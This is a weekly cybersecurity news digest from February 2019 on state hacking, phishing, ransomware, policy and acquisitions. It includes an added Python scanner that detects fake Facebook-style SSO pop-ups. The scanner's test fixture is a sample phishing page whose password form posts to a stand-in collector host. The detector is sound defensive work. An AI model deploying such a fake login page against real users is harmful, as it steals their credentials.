The Week that Was.
February 23, 2019.
By the CyberWire staff
More Fancy Bear sightings.
Microsoft said on Wednesday that it had spotted Russian cyber activity targeting European, Atlanticist think tanks. The targeted institutions include the German Council on Foreign Relations, the Aspen Institutes in Europe, and the German Marshall Fund. Redmond says spearphishing attacks targeted more than a hundred accounts belonging to employees in Belgium, France, Germany, Poland, Romania, and Serbia between September and December 2018. The primary suspect behind the attacks is Fancy Bear (APT28), Russia's GRU military intelligence service. Microsoft believes Fancy Bear's goal was influencing upcoming European elections, noting that the attacks validate warnings raised by European leaders about the threat level in the region.
Australia thinks state espionage services responsible for cyberattack on Parliament.
Australian Prime Minister Morrison announced Monday that "a sophisticated state actor" was behind network intrusions that targeted Parliament and the country's three main political parties (Liberal, Labor, and National) (The Conversation). Alastair MacGibbon, head of the Australian Cyber Security Centre (ACSC), says investigators still don't know which data the attackers had access to, although Labor Party leader Bill Shorten notes that the political parties were compiling "large amounts of information" about voters in preparation for the upcoming federal election (The Verge).
Few details on the attacks have been disclosed, but they're said to have involved a new form of malware with China's "digital fingerprints." Authorities are aware that such fingerprints may be deliberate misdirection by some other nation-state actor (Sydney Morning Herald). MacGibbon said the attackers' level of sophistication restricts the list of suspects to "a limited number of countries" (Australian Broadcasting Corporation). In addition to China, those countries would be Russia, Israel, and the US (Register). (We might point out that such a list should include at least France and the United Kingdom as well.) But it's important to note that this remains public speculation based on conjectured national capabilities, and not on any actual evidence, circumstantial or otherwise. The general consensus, however, is that signs point to China as the prime suspect.
A preliminary attribution by the cyber company Resecurity, discussed Thursday in the Wall Street Journal, cited Iran's Mabna Institute as an even likelier suspect. The Mabna Institute has been indicted by the US for cyberattacks against American enterprises, and Resecurity thinks the activities reported and observed around Australian targets employ techniques Mabna has used in the past. Thus the spoor leading back to China would amount to a false flag operation. But this strikes most other observers as unlikely. The evidence publicly cited is circumstantial and ambiguous at best, including documents retrieved from a cloud server that may or may not have been used by the hackers. Sources close to the investigation but willing to speak anonymously to the Sydney Morning Herald dismiss suggestions of Iranian involvement as far-fetched. They can’t yet speak on the record, but the anonymice in this case seem pretty certain that the attacks are traceable back to Beijing.
The Australian Broadcasting Corporation interviewed some academic experts on attribution. Their explanations of how one tells whether a nation-state is behind an attack are surprisingly impressionistic, more art than science, although there's a bit of science there, too.
Chinese and Iranian cyberespionage surge.
Chinese and Iranian cyberattacks against the United States have escalated recently, with the hackers exhibiting considerably improved levels of skill. Dozens of American corporations and several US government agencies have been attacked by Iranian hackers, and the scope of the attacks is wider than previously reported. The upsurge in Iranian espionage campaigns is thought to be in response to the Trump administration's withdrawal from the Iran nuclear deal. China also increased its espionage after an 18-month lull following the 2015 US-China Cyber Agreement. Chinese attacks are now said to occur as frequently as before the deal took effect. The new attacks are stealthier and more advanced. Boeing, General Electric Aviation, and T-Mobile are among those recently attacked, although it's unclear with what success (New York Times).
Phishing in Facebook.
Researchers with the password manager service Myki discovered a "hyper-realistic" phishing campaign targeting Facebook users by spoofing single sign-on (SSO) login windows. The attackers used a block of HTML to present an SSO window nearly identical to the ones used by Facebook, complete with Facebook's legitimate HTTPS-based URL. The easiest way to detect the fraud is to try to drag the SSO window outside of the primary window. Legitimate SSO prompts can be dragged outside of the web page, while this pop-up will disappear past the edge of the window (Ars Technica). The Myki researchers point out that most users won't be aware of this technique, since it's not included in current phishing guidelines.
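The fake SSO window described above has to paint its own address bar as HTML text, whereas a genuine pop-up's URL lives in browser chrome outside the page's DOM. The following added example (not Myki's or Facebook's code; the two sample pages are constructed here) scans page HTML for that tell: an https:// URL rendered as visible text on the same page as a password field.

```python
"""Heuristic scan for in-page address-bar spoofing (fake SSO pop-ups).

Added example. A real SSO pop-up is a separate window whose URL is drawn by
the browser and never appears in the page's DOM; a fake one must render the
URL itself as text. Text inside <script>/<style> and URLs in attributes
(href, action) are ignored, since those are normal on a login page.
"""
import re
from html.parser import HTMLParser

URL_RE = re.compile(r"https://[a-z0-9.-]+\.[a-z]{2,}(?:/[^\s<]*)?", re.I)


class SsoSpoofScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.painted_urls = []   # URLs rendered as visible page text
        self.password_fields = 0
        self._skip = 0           # depth inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1
        elif tag == "input" and (dict(attrs).get("type") or "").lower() == "password":
            self.password_fields += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.painted_urls.extend(URL_RE.findall(data))


def scan(html: str) -> dict:
    """Return the painted URLs, password-field count and a verdict."""
    p = SsoSpoofScanner()
    p.feed(html)
    p.close()
    return {"painted_urls": p.painted_urls,
            "password_fields": p.password_fields,
            "suspicious": bool(p.painted_urls) and p.password_fields > 0}


# Constructed sample: a page drawing its own "address bar" above a form.
FAKE_SSO = """<html><body><h1>Giveaway</h1>
<div class="fake-popup" style="position:fixed;top:80px;left:200px">
  <div class="address-bar">https://www.facebook.com/login.php</div>
  <form action="https://collector.example/grab" method="post">
    <input name="email" type="text"><input name="pass" type="password">
  </form></div>
<script>var cdn = "https://cdn.example/a.js";</script></body></html>"""

# Constructed sample: an ordinary login form; URLs only in attributes.
LEGIT_LOGIN = """<html><body><form action="/session" method="post">
  <label>Email <input name="email" type="text"></label>
  <label>Password <input name="pass" type="password"></label>
  <a href="https://www.example.com/help">Need help?</a>
</form></body></html>"""

if __name__ == "__main__":
    print(scan(FAKE_SSO))
    print(scan(LEGIT_LOGIN))
```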
Metaphor shift: not Pearl Harbor, but Hamel.
"Cyber blitzkrieg" is a more accurate metaphor for coordinated cyberattacks against multiple sectors of critical infrastructure than "cyber Pearl Harbor" or "cyber storm," according to Professor Greg Austin from the University of New South Wales. He writes that any such attack would be multi-vector, multi-wave, and involve both civilian and military targets. Austin told ZDNet that "states are exploring the use of related tactics very vigorously in a way in which they're not exploring similar tactics for nuclear warfare." He points out that the first known cyberattack against an electric grid happened two decades ago, and the threats have grown far more dangerous since then. Nation-states have mapped their rivals' critical infrastructure for years, and they're already staging disruptive attacks.
Scaling defenses to meet that sort of attack might be more difficult than defenders would wish. Australian Defence Force (ADF) Head of Information Warfare Major General Marcus Thompson worries that Australia wouldn't be able to defend against a large-scale, coordinated attack against its critical infrastructure (ZDNet).
(The defining characteristics of Blitzkrieg were combined arms, fast operational tempo, detailed planning, and closely coordinated mobile action. This approach to combat wasn't named until the Germans followed it in 1939, but Lieutenant General Sir John Monash was almost certainly its first practitioner, as early as 1918, with a coordinated attack using infantry, artillery, air, and armor. So give the Australian Army full credit, and instead of "Blitzkrieg," we'll say "Hamel.")
Black market report.
Researchers at Top10VPN compiled two reports on dark web commodity pricing in the United States and the United Kingdom, showing that a full online identity of the average person in the US is worth around $1200, while the average value of someone in the UK is approximately £800. The US report shows that hacked Amazon accounts are worth $30 each, topping the list of online shopping accounts. Best Buy accounts come in second at $26.50. The researchers say accounts with these two companies are the most valuable due to their high-value inventories. Stolen bank details in the US average $259. The UK report shows that a British Airways account is worth nearly £32, after the company suffered a massive data breach last year. The average price for someone's bank details in the UK is £347.
Researchers at Coveware and McAfee looked at communications between attackers and victims of ransomware attacks, noting that attackers in these cases, particularly in recent, targeted campaigns, often provide their victims with 'support' to walk them through the payment process and the subsequent decryption of their files (Coveware). Ryuk ransomware, for example, comes with one of two notes. One is friendly and well-written, and asks for about 50 Bitcoin. The other is brusque and to the point, but asks for a lower amount between 15 and 35 Bitcoin. Replies from Ryuk operators during negotiations are terse messages that typically convey the bare minimum of necessary information. After a victim pays the hefty ransom, the attackers will provide a decryptor, although the decryptor is very buggy and is likely to permanently destroy the encrypted files (Help Net Security).
Digital Shadows published a white paper revealing that cyber criminals are offering average annual salaries of $360,000, with one group offering a starting salary of $768,000, which will increase to $1,080,000 after the second year of work (Business Wire).
Two WordPress plugins have issued security patches. WP Cost Estimation & Payment Forms Builder fixed a directory traversal vulnerability, and the Simple Social Buttons plugin received a patch for a critical vulnerability that could allow privilege escalation (Infosecurity Magazine).
Adobe released another patch for the critical zero-day vulnerability in Acrobat Reader: last week's patch for the bug left a security hole (Threatpost).
Crime and punishment.
The strange case of Paul Whelan, detained in Russia on espionage charges, is still strange, as he and his family appear caught in a paperwork Catch-22, and as Russian authorities seem in no hurry to go to trial (Foreign Policy).
Lauri Love, arrested in 2013 by Britain's National Crime Authority for hacking but not charged, sued the NCA to get his seized devices back. The judge said no. Since by Mr. Love's admission the data they contained weren't his, he's not entitled to get them back (Naked Security).
The fraud case against Autonomy executives involved in the sale of that company to HP has touched DarkTrace, lightly. Nicole Eagan, co-CEO of the Cambridge unicorn, has held a voluntary interview with the FBI (Telegraph). Two Autonomy executives, former CEO Mike Lynch and former CFO Sushovan Hussain, had held seats on DarkTrace's board until they resigned last year after coming under suspicion of fraud (or, in Hussain's case, being convicted of fraud (Bloomberg)). DarkTrace does not seem to be suspected of involvement in the alleged securities fraud, but the company was the subject of the first investment by Invoke Capital, a venture fund Lynch founded after he sold Autonomy to HP in 2011 (City A.M.).
Courts and torts.
A class action suit alleging unfair "no-poach" agreements among US Federal contractors has been filed (HR Dive).
Policies, procurements, and agency equities.
The UK's House of Commons has issued a report calling for more regulation of social media (BBC).
Some inside baseball at the US Department of Homeland Security: Congress has told DHS to keep $90 million in cybersecurity research funding in its Science and Technology Directorate, stopping plans to shift the money to the Cybersecurity and Infrastructure Security Agency (FCW).
Fortunes of commerce.
Samsung is investing in its networking equipment line, hoping that international security concerns about Huawei will enable it to steal a march on its Chinese competitor (NDTV Gadgets 360).
Gizmodo says that NSO Group has renamed itself Q Cyber Technologies. The rebranding preceded this week's formation of a competing business alliance, Intellexa, in which a number of lawful intercept and spyware vendors will assemble to offer a "one-stop shop" for their wares.
Security concerns about Huawei were met with a double backlash. China accuses the US of simple trade-war bullying (Forbes). Beijing has also warned Canada of unspecified but costly consequences should that country exclude Huawei from its 5G buildout. Presumably those consequences would involve litigation over an alleged breach of a foreign protection agreement (CBC).
Sentiment in favor of closer regulation of tech companies, especially of social media, rises (Telegraph). Sources in the UK in particular see an end to Big Tech's "self regulation" (Telegraph). The Parliamentary report on fake news was scathing: "Companies like Facebook should not be allowed to behave like ‘digital gangsters’ in the online world, considering themselves to be ahead of and beyond the law."
Facebook CEO Zuckerberg, with whom the US Congress would again like to speak (Silicon Valley Business Journal), has delivered a talk on ethics as partial fulfillment of promises the company has made to do better (TechCrunch).
Splunk has decided to exit the Russian market (ZDNet).
Whatever the challenges, problems, and promises of artificial intelligence may be, one issue will surely be the availability of human labor qualified to build it (WIRED). AI will produce as well as relieve labor shortages.
Military personnel systems aren't immune to changing needs and changing work forces. The US Army, for one, is studying ways to modernize its own personnel system (Federal News Network). But we imagine 11Bs and 13Bs will be with us always.
Mergers and acquisitions.
On Tuesday Palo Alto Networks made it official: its rumored acquisition of Israeli security firm Demisto will go through, at a price tag of $560 million. Demisto specializes in security automation and orchestration (TechCrunch). Here's the 8-K. Silicon Valley Business Journal discusses the acquisition as a case study in how venture capital works (since the obverse of every acquisition is an exit).
Virginia-based Dark Cubed has acquired Fenris IV Incorporated, also based in Virginia. Dark Cubed, which focuses on threat protection for highly regulated small and medium businesses, will integrate Fenris IV's endpoint protection, scanning, penetration testing, and other services into its offerings (PRNewswire). (As Technical.ly DC notes, Fenris IV is not to be confused with Fenris Digital, a different company.)
Micro Focus is buying security analytics software shop Interset. Micro Focus intends to integrate Interset's offerings into its Security, Risk, and Governance portfolio (Help Net Security).
Apple has "quietly" acquired AI specialist PullString in a deal thought to be worth at least $30 million (ZDNet).
As it exits stealth, Silicon Valley-based Armorblox announces a $16.5 million Series A round. General Catalyst led the round, with participation from Point72 Ventures. Armorblox offers deep learning technologies designed to thwart social engineering (CrunchBase).
And security innovation.
RSAC 2019's Launch Pad will offer start-ups an opportunity to pitch venture capitalists (Help Net Security).
A note on some hundred AI start-ups thought to be worth watching (CB Insights).
Investors are concerned that moves in the Maryland Assembly to restrict TEDCO funding could inhibit the development of a robust startup community in the state (Baltimore Business Journal).
Today's issue includes events affecting Australia, Canada, China, European Union, Germany, Russia, United Kingdom, United States.